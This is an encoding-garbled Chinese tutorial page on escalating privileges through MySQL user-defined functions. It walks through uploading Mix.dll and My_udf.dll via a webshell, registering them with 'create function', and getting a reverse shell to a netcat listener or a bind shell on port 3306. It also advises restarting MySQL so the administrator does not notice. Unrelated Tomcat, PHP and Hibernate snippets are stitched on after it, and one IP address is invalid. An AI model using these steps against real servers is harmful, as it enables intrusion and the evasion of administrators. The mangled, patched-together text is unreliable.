mysql¼òµ¥ÌáȨ
S- servÌáȨ·½Ê½ÈËÈ˶¼»áÓÃÁË£¬¸ãµÃÏÖÔÚµÄÖ÷»ú¶¼ÅäÖõ÷dz£°²È«£¬¿´À´¹¥»÷ÊÖ·¨µÄ²ã³ö²»ÇîÒ²ÊÇÔì³ÉÖйúÍøÂ簲ȫ½ø²½µÄÒ»´óÔÒòÖ®Ò»£¬»¹ÓÐÆäËûµÄ pcanywhere»ñÈ¡ÃÜÂë£¬Ìæ»»·þÎñ£¬µÈµÈ¡£µ«ÊÇÏÖÔÚҲûÕâôºÃ¸ãÁË£¬Ëæ×Ű²È«ÒâʶµÄÌá¸ß£¬Ö®Ç°µÄ·½Ê½¹À¼Æ²»Ôõô¹ÜÓã¬ÏÖÔÚÎÒ¸ø´ó¼Ò½éÉÜÒ»ÏÂÒ»ÖÖеÄÌáȨ·½Ê½£¬¿´¹ý¹ÅµäLM×öµÄÄǶ¯»µÄÅóÓѶ¼ÖªµÀ°É£¿ÀûÓÃMYSQLlÈõ¿ÚÁîÄõ½ÏµÍ³È¨ÏÞ£¬ÔÚWEBSHELÉÏÒ²¿ÉʵÏÖ£¬²»¹ýÓиöǰÌᣬ¾ÍÊÇÄ¿±êÖ÷»ú×°ÓÐ MYSQL£¬¶øÄãÓÖÖªµÀMYSQLµÄÓû§ºÍÃÜÂ룬²Å¿ÉÒÔ½øÐÐÌáȨ¡£WEBSHELL»ñµÃÁË£¬ÕÒÓû§ºÍÃÜÂëÒ²²»ÊÇʲôÄÑÊ¡£ÏÖÔÚÎÒÄÃÎÒÁíÍâһ̨»úÆ÷×öʾ·¶£¬ÒѾ°ÑPHPSHELL´«ÉÏÈ¥ÁË,Ò»°ãÀ´ËµÁ¬½ÓMYSQLµÄÕÊ»§ÃÜÂëºÜºÃÕÒ£¬Ëæ±ã±à¼Ò»¸öPHPÎļþ£¬¾Í¿´µ½ÁË¡£
¿´µ½Á˰ɣ¬Óû§Ãû£ºroot ÃÜÂ룺123456 ¿âÃû£ºphp È»ºóÔõô°ìÄØ£¿ÏÈÓÃSQL Query ½¨Á¢Á¬½Ó£¬¹þÁ¬½Ó³É¹¦ÁË£¬ÏÖÔÚ¿ªÊ¼½«ÎÒÃǵÄÌáȨÓõζ«¶«:Mix.dll My_udf.dllÉÏ´«ÉÏÈ¥ÏÈ.OK£¬´«ºÃÁË£¬Mix.dllÓÃÓÚ·´µ¯Á¬½Ó£¬My_udf.dllÊÇÕýÏòÁ¬½Ó£¬Ö±½ÓÓÃÁ¬½Ó¶Ô·½µÄ3306¶Ë¿ÚÈ»ºóÊäÈëÃÜÂë¾Í¿É»ñµÃCMDSHELL¡£ºÃ£¬²»¶à˵ÁË£¬´«ÉÏÈ¥Ö®ºóÄØ¾ÍÖ´ÐÐÒÔÏÂSQLÓï¾ä
create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; //my_udf.dll
À´×¢²áº¯Êý.
³öÏÖSQLÓï¾ä³É¹¦Ö´ÐУ¡
ÀëÄõ½CMDSHELLÒѾ²»Ô¶ÁË£¬ÎÒÃÇÏÈÓÃNCÔÚ±¾µØ¼àÌýÒ»¸ö¶Ë¿ÚÏÈ£¬Nc -l -p 1234 £¨Õâ¸öÎÒÏë²»ÓýØÍ¼Á˰ɣ©¶øºóÖ´ÐÐÓï¾ä£º
select Mixconnect('192.168.1.520','1234');
À´¼¤»îÄǸöº¯Êý£¬Ö´Ðгɹ¦£¬È»ºó¿´¿´ÎÒÃǵÄNCÓз´Ó³Ã»,³É¹¦µÃµ½CMSHELL£¬²»¹ýÕâʱ¶Ô·½µÄMYSQLÒѾ¼ÙËÀ¿©£¬ÎÒÃÇÒª°ÑMYSQL·þÎñ½ø³Ì¸ø killµô£¬È»ºóÖØÐÂÆô¶¯MYSQL·þÎñ²ÅÐУ¬²»È»¹ÜÀíÔ±·¢ÏÖÍøÕ¾ÔËÐв»ÁËÁË£¬ÄǾ͡£¡£¡£¡£Èç¹û¸Ã·þÎñÆ÷²»ÔÊÐíÁ¬½ÓÈκÎÍⲿIPºÍ¶Ë¿Ú£¬¶øËûµÄ3306¶Ë¿ÚÈ´ÊǶÔÍ⿪µÄ£¡ÕâʱMy_udf.dll¾Í¸ÃÉϳ¡ÁË£¬Ê¹Ó÷½·¨ºÍMixÒ»Ñù£¬Á¬½ÓMYSQL³É¹¦ºóÖ´ÐÐÈçÏÂÓï¾ä£º
create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll';
Ö´ÐÐÓï¾ä³É¹¦ºó£¬È»ºóÎÒÃǾͿªÊ¼¼¤»îÕâ¸öº¯Êý£¬ÊäÈëÓï¾ä£º
select my_udfdoor ('');
È»ºóÓÃncÁ¬½Ó3306¶Ë¿Ú,È»ºóÊäÈëfuck ¾Í¿ÉÒԵõ½Ò»¸öcmdshellÁË.
Ïà¹ØÎĵµ£º
1¡¢Ð½¨¶¯Ì¬webÏîÄ¿¡£
2¡¢Ìí¼Ójar°ü
½«mysql jdbcÇý¶¯Ìí¼Óµ½tomcat°²×°Ä¿Â¼ÏµÄlibĿ¼¡£
3¡¢ÔÚMETA-INFÏÂÌí¼Ócontent.xmlÎļþ¡£ÄÚÈÝÈçÏ£º
<?xml version="1.0" encoding="UTF-8"?>
<Context reloadable="true" crossContext="true">
<!-- Default set of monitored resources - ......
×¼±¸¹¤×÷£º
°²×°tomcat5.5£¨×¢ÒâÕâµã£©
°²×°mysql
¿½±´mysqlÇý¶¯µ½tomcat_home/common/libÏÂ
н¨Ò»¸öweb¹¤³Ì
ÔÚ¹¤³ÌÖмÓÈëindex.jsp
<%@page import="java.util.*,javax.naming.*,java.sql.*,javax.sql.*" %>
<%@page contentType="text/html;charset=BIG5"%>
<% ......
1¡¢mysql_connect()-½¨Á¢Êý¾Ý¿âÁ¬½Ó
¸ñʽ£º
resource mysql_connect([string hostname [:port] [:/path/to/socket] [, string username] [, string password]])
Àý£º
$conn = @mysql_connect(”localhost”, “username”, “password”) or dir(”²»ÄÜÁ¬½Óµ½Mysql Server” ......
½ñÌìÔÚ°ïÅóÓѵ÷ÊÔÒ»¸ö¹ØÓÚ¶àÏ̷߳ÃÎÊͬһÕűíÒýÆðµÄLock wait timeout exceedeµÄÎÊÌ⣬¸Ð¾õÒýÆðµÄÔÒòÓУº
1£¬Ã»ÓнøÐÐÓÅ»¯£¬¾¡Á¿±ÜÃâ¶àÏß³Ì
2£¬¸ù¾ÝËüºóÃæ±¨µÄÒì³££¬ÌáÐÑÎÒ¿ÉÒÔHibernate µÄSessionûÓÐʹÓõõ±£¬(Ò²ÊÇÎÒ½â¾öµÄ·½°¸)
3£¬ÓÃsynchronizedÐÞÊθüбíµÄº¯Êý
¹À¼ÆÊÇÔÀ´³ÌÐòÔÚÐÞ¸ÄÍê¸Ã±íʱÁ¢¿Ì½øÐÐÁ˲åÈë²Ù× ......